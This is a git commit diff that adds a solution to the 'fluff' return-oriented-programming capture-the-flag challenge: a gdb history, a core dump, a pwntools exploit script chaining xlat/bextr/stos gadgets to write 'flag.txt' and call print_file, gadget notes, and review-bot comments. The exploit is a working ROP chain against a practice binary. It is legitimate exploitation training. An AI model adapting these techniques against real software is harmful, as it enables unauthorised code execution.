Diffstat (limited to 'x86_64/fluff')
-rw-r--r--x86_64/fluff/.gdb_history239
-rw-r--r--x86_64/fluff/corebin0 -> 4292608 bytes
-rwxr-xr-xx86_64/fluff/exploit.py49
-rw-r--r--x86_64/fluff/gadgets44
4 files changed, 332 insertions, 0 deletions
diff --git a/x86_64/fluff/.gdb_history b/x86_64/fluff/.gdb_history
new file mode 100644
index 0000000..cfa1057
--- /dev/null
+++ b/x86_64/fluff/.gdb_history
@@ -0,0 +1,239 @@
+quit
+quit
+continue
+nexti
+nexti
+info reg rdi
+stepi
+nexti
+info reg rcx
+nexti
+info reg rbx
+stepi
+info reg rdx
+inro reg rbx
+info reg rbx
+quit
+stepi
+continue
+stepi
+x rbx
+info reg rbx
+quit
+conitnue
+continue
+stepi
+info reg rbx
+info reg rcx
+quit
+continue
+stepi
+info reg rbx
+info reg rdx
+quit
+continue
+stepi
+info reg rbx
+quit
+continue
+stepi
+info reg rbx
+quit
+continue
+stepi
+info reg rbx
+quit
+continue
+stepi
+stepi
+info reg rcx
+stepi
+info reg rbx
+info reg rdx
+quit
+continue
+stepi
+info reg rbx
+stepi
+info reg rbx
+quit
+stepi
+continue
+stepi
+info reg rbx
+stepi
+info reg rbx
+quit
+quit
+continue
+stepi
+info reg rbx
+quit
+stepi
+continue
+stepi
+info reg rbx
+stepi
+info reg rbx
+quit
+continue
+stepi
+info reg rbx
+stepi
+info reg rdx
+quit
+continue
+stepi
+info reg rbx
+quit
+continue
+stepi
+quit
+continue
+stepi
+info reg rbx
+quit
+quit
+continue
+stepi
+stepi
+info reg rbp
+stepi
+info reg rax
+stepi
+info reg rax
+stepi
+info reg rdi
+x/s 0x601be0
+stepi
+x/s 0x601be0
+stepi
+x/s 0x601be0
+stepi
+x/s 0x601be0
+stepi
+x/s 0x601be0
+stepi
+x/s 0x601be0
+q
+continue
+stepi
+x/s 0x601be0
+stepi
+x/s 0x601be0
+stepi
+x/s 0x601be0
+stepi
+quit
+conitnue
+continue
+continue
+stepi
+quit
+x 0x0000000000400000
+x/c 0x0000000000400000
+x/c 0x00000000004003c4
+x/c 0x0000000000400000
+quit
+continue
+stepi
+x/s 0x601be0
+x/c 0x0000000000400251
+stepi
+stepi
+x/s flag.txt
+x/s 0x601be0
+quit
+watch *0x601be0 + 7
+continue
+x/s 0x601be0
+continue
+x/s 0x601be0
+x/s 0x601be1
+x/s 0x601be0
+x/s 0x601be7
+continue
+x/s 0x601be7
+x/s 0x601be0
+continue
+quit
+watch *0x601be4
+continue
+x/s 0x601be0
+continue
+x/s 0x601be0
+continue
+x/s 0x601be0
+stepi
+stepi
+x/s $rdi
+x/s 0x601be0
+quit
+continue
+x/s 0x601be0
+quit
+break *0x00000000004006a3
+continue
+context
+stepi
+x/s $rdi
+stepi
+quit
+break *0x00000000004006a3
+continue
+context
+c/s 0x7ffdf0faba10 - 8
+x/s 0x7ffdf0faba10 - 8
+x/s 0x7ffdf0faba10 - 4
+x/s 0x7ffdf0faba10 - 16
+x/x 0x7ffdf0faba10 - 8
+x/x 0x7ffdf0faba10
+x/x 0x7ffdf0faba10 = 4
+x/x 0x7ffdf0faba10 - 4
+x/x 0x7ffdf0faba10 + 4
+context
+info reg rdi
+info reg rip
+search
+search 0x601be0
+search --qword 0x601be0
+search --qword 0x601be0 --writable
+search --qword 0x0000000000400510 --writable
+context
+continue
+stepi
+continue
+stepi
+quit
+break *0x00000000004006a3
+continue
+stepi
+continue
+x/i 0x400639
+x/10i 0x400639
+quit
+break *0x400639
+conitnue
+continue
+x/s 0x601be0
+continue
+x/s 0x601be0
+continue
+x/s 0x601be0
+stepi
+quit
+break *0x400639
+continue
+continue
+x/s 0x601be0
+continue
+x/s 0x601be0
+continue
+x/s 0x601be0
+stepi
+stepi
+x/s 0x601be0
+x/x 0x601be0 + 8
+x/x 0x601be0 + 9
+x/x 0x601be0 + 10
+quit
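Review bot: .gdb_history and the 4 MB core dump added alongside it are debugger artifacts rather than sources and should be dropped from the commit and listed in .gitignore. A core file is a full snapshot of the target's process memory (stack, heap, mapped data), so if the run reached print_file it may carry the flag contents, and in general it leaks whatever the process had in memory at the crash. The history itself records nothing reproducibly; the breakpoints and `x/s 0x601be0` checks that actually mattered for the exploit are better captured as a comment next to the gdbscript in exploit.py.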
diff --git a/x86_64/fluff/core b/x86_64/fluff/core
new file mode 100644
index 0000000..ae36a67
--- /dev/null
+++ b/x86_64/fluff/core
Binary files differ
diff --git a/x86_64/fluff/exploit.py b/x86_64/fluff/exploit.py
new file mode 100755
index 0000000..cdf5de8
--- /dev/null
+++ b/x86_64/fluff/exploit.py
@@ -0,0 +1,49 @@
+#!/usr/bin/env python3
+from pwn import *
+
+letter_lookups = {
+ 'f' : 0x00000000004003c4,
+ 'l' : 0x0000000000400239,
+ 'a' : 0x00000000004003d6,
+ 'g' : 0x00000000004003cf,
+ '.' : 0x0000000000400251,
+ 't' : 0x0000000000400192,
+ 'x' : 0x0000000000400246}
+
+def write_str(dest, string, payload):
+ payload += p64(0x00000000004006a3)
+ payload += p64(dest)
+ for c in string:
+ payload += p64(0x40062a)
+ payload += p64(0x4000) # if things go wrong, check endian/order
+ payload += p64(letter_lookups[c] - 0x3ef2)
+
+ payload += p64(0x0000000000400610)
+ payload += p64(0)
+
+ payload += p64(0x400628)
+
+ payload += p64(0x400639)
+
+ return(payload)
+
+
+prog = gdb.debug('./fluff', gdbscript='''
+break *pwnme + 151
+'''
+)
+payload = b''
+for c in range(40):
+ payload += b'a'
+
+payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
+payload += p64(0x00000000004006a3)
+payload += p64(0x601be0) # set rdi
+
+payload += p64(0x0000000000400510)
+
+payload += b"\n"
+prog.sendline(payload)
+sleep(1)
+print(str(prog.recv(), 'UTF-8'))
+prog.interactive()
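Review bot: write_str copies the eight bytes of 'flag.txt' to 0x601be0 but never writes a terminator, so print_file@plt only sees a clean filename if the bytes after 0x601be8 already happen to be zero (the trailing `x/x 0x601be0 + 8/9/10` probes in .gdb_history suggest this was checked by hand rather than guaranteed). Because the 0x400610 gadget zeroes eax, a NUL can be appended after the loop at no extra cost: `payload += p64(0x0000000000400610) + p64(0) + p64(0x400639)`. The '.' entry (0x400251) also disagrees with the gadgets notes, which list 0x400000 (the ELF magic, not a '.'), so the lookup table deserves a comment stating that each address was confirmed with `x/c`. Minor style: `b'a' * 40` replaces the padding loop, `0x600df0 + 0x00000df0` is just `0x601be0` and should say what that address is (presumably a writable region the string can live in; verify), and the explicit `b"\n"` is redundant with sendline.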
diff --git a/x86_64/fluff/gadgets b/x86_64/fluff/gadgets
new file mode 100644
index 0000000..6c2f329
--- /dev/null
+++ b/x86_64/fluff/gadgets
@@ -0,0 +1,44 @@
+Memory bytes information
+=======================================================
+0x00000000004003c4 : 'f'
+0x0000000000400239 : 'l'
+0x00000000004003d6 : 'a'
+0x00000000004003cf : 'g'
+0x0000000000400000 : '.'
+0x0000000000400192 : 't'
+0x0000000000400246 : 'x'
+0x0000000000400192 : 't'
+
+0x0000000000400610 : mov eax, 0 ; pop rbp ; ret
+
+400628: d7 xlat BYTE PTR ds:[rbx] #mov al, [rbx + al] requires rbx
+***
+40062a: 5a pop rdx
+40062b: 59 pop rcx
+40062c: 48 81 c1 f2 3e 00 00 add rcx,0x3ef2
+400633: c4 e2 e8 f7 d9 bextr rbx,rcx,rdx
+
+#rdx is controller.
+rdx bits 0-7: starting bit
+rdx bits 8-15: length
+***
+400639: aa stos BYTE PTR es:[rdi],al #moves al to rdi, then adds rdi
+ # requires rdi (check), al
+
+
+
+0000000000400510 : print_file@plt
+
+
+0x00000000004006a3 : pop rdi ; ret
+
+
+exploit:
+
+write to memory using al as letter
+ set al to zero
+ set rbx to memory location
+ rcx: (location - 0x3ef2) before bextr
+ rdx: 0x00 0x20 (from position zero, using 32 bits)
+
+